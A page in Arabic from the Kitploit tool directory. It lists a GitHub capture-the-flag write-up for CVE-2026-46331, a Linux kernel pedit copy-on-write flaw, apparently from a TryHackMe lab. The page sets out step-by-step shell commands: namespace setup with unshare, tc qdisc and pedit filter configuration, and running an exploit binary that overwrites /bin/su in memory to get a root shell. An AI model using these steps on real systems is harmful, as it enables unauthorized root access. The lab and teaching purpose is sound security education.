Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/marwahhadi/cve-2026-46331-pedit-cow
تصعيد الامتيازاتالاستغلالCTFالتعلم والتعليماستغلال الملفات الثنائية
GitHubmarwahhadi/cve-2026-46331-pedit-cow

CVE-2026-46331-pedit-cow

شرح وخطوات استغلال ثغرة pedit COW (CVE-2026-46331)

عرض المستودع
1منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-46331-pedit-cow

كتابة تفصيلية وخطوات استغلال لثغرة pedit COW (CVE-2026-46331).

نظرة عامة

يتناول هذا التحدي ثغرة pedit COW، وهي خلل في نواة لينكس ضمن إجراء تحرير الحزم (act_pedit) في النظام الفرعي للتحكم في حركة المرور. تسمح هذه الثغرة لمستخدم غير مميَّز باستبدال نسخة في الذاكرة من ملف ثنائي setuid-root، مما يمنحه فعليًا root shell دون لمس الملف على القرص أبدًا.

خطوات الاستغلال

1. الإعداد الأولي

تبدأ البيئة بمستخدم غير مميَّز (karen).

root@kitploit:~
id
cd ~/packet_edit_meme
make packet_edit_meme

2. تصعيد الصلاحيات (إنشاء Namespace)

تتطلب تهيئة التحكم في حركة المرور عادةً صلاحيات CAP_NET_ADMIN، وهي غير متوفرة للمستخدم العادي. استخدمت مساحات أسماء المستخدمين غير المميَّزة (unprivileged user namespaces) للحصول على هذه الصلاحية.

root@kitploit:~
unshare -r -n

3. تهيئة إجراء التحكم في حركة المرور

داخل مساحة الاسم، قمت بتهيئة clsact qdisc وطبّقت فلترًا لتفعيل إجراء pedit.

تنظيف أي إعدادات موجودة إذا لزم الأمر

root@kitploit:~
tc qdisc del dev lo clsact

إعداد qdisc والفلتر

root@kitploit:~
tc qdisc add dev lo clsact
root@kitploit:~
tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64

5. تنفيذ الاستغلال

بعد إعداد البيئة، خرجت من root shell ونفّذت الاستغلال كمستخدم غير مميَّز.

root@kitploit:~
exit
./packet_edit_meme

5. النتيجة النهائية

نجح الاستغلال في استبدال إدخال /bin/su، مما وفّر root shell تفاعلية.

root@kitploit:~
# cat /root/flag.txt

THM{YOUR_FLAG_HERE}

تنزيل الأداة